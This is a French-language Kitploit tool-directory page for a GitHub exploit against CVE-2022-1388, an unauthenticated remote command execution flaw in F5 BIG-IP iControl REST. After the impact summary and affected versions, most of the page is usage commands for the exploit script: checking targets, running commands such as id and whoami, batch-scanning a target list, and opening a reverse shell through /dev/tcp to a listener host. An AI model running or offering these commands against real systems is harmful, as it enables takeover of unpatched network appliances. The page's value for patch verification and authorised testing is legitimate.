Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/al1ex/cve-2022-1388
Scanners de VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubal1ex/cve-2022-1388

CVE-2022-1388

CVE-2022-1388 F5 BIG-IP iControl REST RCE

Voir le dépôt
37123il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Impact de la vulnérabilité

Cette vulnérabilité peut permettre à un attaquant non authentifié ayant un accès réseau au système BIG-IP via le port de gestion et/ou les adresses IP self d'exécuter des commandes système arbitraires, de créer ou supprimer des fichiers, ou de désactiver des services.

Produits concernés

  • F5 BIG-IQ 11.6.1 - 11.6.5
  • F5 BIG-IP 12.1.0 - 12.1.6
  • F5 BIG-IP 13.1.0 - 13.1.4
  • F5 BIG-IP 14.1.0 - 14.1.4
  • F5 BIG-IP 15.1.0 - 15.1.5
  • F5 BIG-IP 16.1.0 - 16.1.2

Vérification de la vulnérabilité

Utilisation de base

root@kitploit:~
python3 CVE_2022_1388.py

utilisation

Vérification de la vulnérabilité

root@kitploit:~
python3 CVE_2022_1388.py -v true -u https://192.168.17.200

vérification

Exécution de commande :

root@kitploit:~
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c id

exécution_commande

Télécharger l’outil
root@kitploit:~
python3 CVE_2022_1388.py -a true -u https://192.168.17.200/ -c whoami

exec_2

Analyse par lots

root@kitploit:~
python3 CVE_2022_1388.py -s true -f check.txt

batch_scan

Shell inverse

root@kitploit:~
python3 CVE_2022_1388.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"

reverse_shell

reverse_shell_ok

Références

https://support.f5.com/csp/article/K23605346

https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw

https://twitter.com/jas502n/status/1523611433938059265

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388

https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr